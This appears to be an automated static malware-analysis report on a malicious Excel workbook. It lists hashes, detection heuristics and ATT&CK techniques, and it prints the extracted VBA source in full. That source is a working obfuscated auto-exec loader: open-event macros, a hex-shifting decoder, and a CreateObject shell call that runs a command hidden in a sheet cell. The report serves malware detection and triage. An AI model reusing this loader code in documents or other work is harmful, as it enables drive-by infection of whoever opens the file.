Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df7d0f5a7bebba87…

MALICIOUS

Office (OLE)

895.0 KB Created: 2018-04-10 15:35:54 Authoring application: Microsoft Excel First seen: 2019-01-12
MD5: b84c8a5982e88ef77e35e29b19ea0ab1 SHA-1: 67983cefd4ec081282a65a694e6285efadb75b60 SHA-256: df7d0f5a7bebba8746c851f3be59b6626441ac5ad781da8d0618a4d9f53e32a8
402 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains heavily obfuscated VBA and XLM macros, including an Auto_Open and Document_Open subroutine. The VBA macro uses a custom decoder function 'UKP_R' to deobfuscate strings, one of which is 'ADA9B9C8BFC6CA84A9BEBBC2C2'. This deobfuscated string is then passed to VBA's CreateObject function, strongly suggesting it is used to instantiate a malicious object or execute a command. The presence of multiple auto-execution macros and obfuscation techniques indicates a downloader or dropper functionality.

Heuristics 10

  • ClamAV: Xls.Malware.Valyria-6934883-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6934883-0
  • Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPEN
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 229 bytes
SHA-256: fcf35f1fa50ffd18156c14626785018e91b64741c3871fd95926ff05070e1aa6
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  XPNo
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9259 bytes
SHA-256: 0a0198f403b55da5f8f628f7e95bcf9b3d325fe4ede5de4cff9bb859a0a5d89c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Function UKP_R(ByVal text As String)
   Dim CW_ZD As String
   Dim P_L As Long
   For P_L = 1 To Len(text) Step 2
        CW_ZD = CW_ZD & Chr(Asc(Chr("&H" & Mid(text, P_L, 2))) - 86)
   Next
   UKP_R = CW_ZD
End Function
Public Sub Auto_Open()
    Application.Run "FIV_NV"
End Sub
Sub FIV_NV()
    C_F
End Sub
Public Sub Document_Open()
    Application.Run "FIV_NV"
End Sub
Public Sub C_F()
    Dim EYM_HG As Object: Set EYM_HG = VBA.CreateObject(UKP_R("ADA9B9C8BFC6CA84A9BEBBC2C2"))
    Dim K_WGC As String
K_WGC = "8C959595C0959578B495958CC086AAA595C8B99595958ABE958D95BA95958F95647F5C849595BEBF9595959695D1959595959563B1779EBDD095BAA5959561C9BCB15CA376959595B595669595CF6495959595689595955D95958B955A6F8D9595FE87CABFC595959595CA6795C8579595BF959595"
Dim PNF_J As String
PNF_J = "959595AF9561959C95B8957E95959DD3BAA3A99569949586AA8A60B295A495959595CB956C689595BDAA95A06695B695958695BF5DB45AC0569595B59588A462A995A491959595CE9E955F7A7B9595959D7895A976C3D16795958395BC74B6955995959F8CA65C8B959595959C95959E66959589B9"
Dim G_R As String
G_R = "7D9395959595678092637695C3D1959571CAC48595956CB795569595A6AD9FB38077959570BE5F9595957B9B86AC57A79586A05995C37C8868939596A995958D98B0958F5661BBA66F8B7E9295B59595B17D95AFCB95955E81859597958EA4639595BC6E957A958E9595D59586C7959595950E9595"
Dim BQX_KZ As String
BQX_KZ = "958B95959595C895BEC1BD586F9595D09595A39582C75B95CC8576AA95C0959A955795635D95C1955FB97F95958E9582956FC5958C95BD959CCEABA7AF9557C295BF956E95959595D2796395739595847E95A69595CFD1B15795956F7F94B89595AB9595A1839595B8AF957F95B579867895956295"
Dim AY_P As String
AY_P = "7F959556959595A99575A5B8B8AA95D14056956E579B95959A959571959595BBC072C183959595BCD3959595B49595A995958D6285669595B9839595B195959A9595958DC7A389956FAF95AA9595C69E7C95CA39958CB0B79595B7A66A609595ADA0B85A9595AF95959595CBBC95B39595AA8D9595"
Dim AKZ_Y As String
AKZ_Y = "95959595B95BA495A7CE649A9595715F7695B5959595809595BDA9B5D295C795BC959895957695E07C956F73958F83956DBC959595AE82C59595957B955DC99595D49B77569595AD8B945995959FB47CA48CAF8B9595D39595A5955C955C759090A6CC9562D59895B89595AA8B95AA95B795B99594"
Dim ISD_LM As String
ISD_LM = "87959595BBA695A2A6958E9595958898956C95A097567E9570959595C7955FC0CF819585959767669EC6CE95B1958495959595959595958B95B29595C8959595C45D9595AEBC8F869595637A9591CC8B9595BC7995D39595958A95BB9C959595B6959B7D957C938695CB9A95956795768A959595AF"
Dim LX_YKY As String
LX_YKY = "C79595D0957A9595955B95AA959595A593958CCDA68F9595959F95879567BCB4955AA99578956E95959483D3A36E7F95AD95957995CE95959595958E95A995959595718C9595959595CCCD958795A2AF95C1919595989593958CA8A095CDA195969195CB95B29595B6BE5F9579AB959595975D9595"
Dim S_NVB As String
S_NVB = "989C95BCC89595957995696173959595959595CB95959595C99595955FD5C8B9AE855A95976295CE9595659F956695719FC07EAE95AE95959570957995959595A1C2959595B75B959595955695A495AC6FB956D391C698956FABAF95D0955C9581959595AB9595A8956195A39595C7949394D5ACA0"
Dim T_MW As String
T_MW = "9EB587A99562959599959586959556C8CB95859595B1C6957095928795D19577CC95CA64959595955D9595959795C993629595958595B3957D7E95995D95959A9564869F95B9895C95BDD0AA959595958A957A74958D9595799595BF6B9595A795959588BD7F9595B39558958A5F56959564645E9595BB9572BF7B95D2959595957E9595C57161A4D1959E8B80957095B4955D9595959582796C955A6A829595607662B064956C9559956B73739595956095739595AC95BD"

    EYM_HG.Exec (UKP_R(ThisWorkbook.Sheets("XPNop").Range("J225").Value))
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook.FIV_NV"
End Sub

' Processing file: /opt/analyzer/scan_staging/84230c6656fb4eefa6ed0379246a4e1c.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 10253 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	FuncDefn (Public F
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.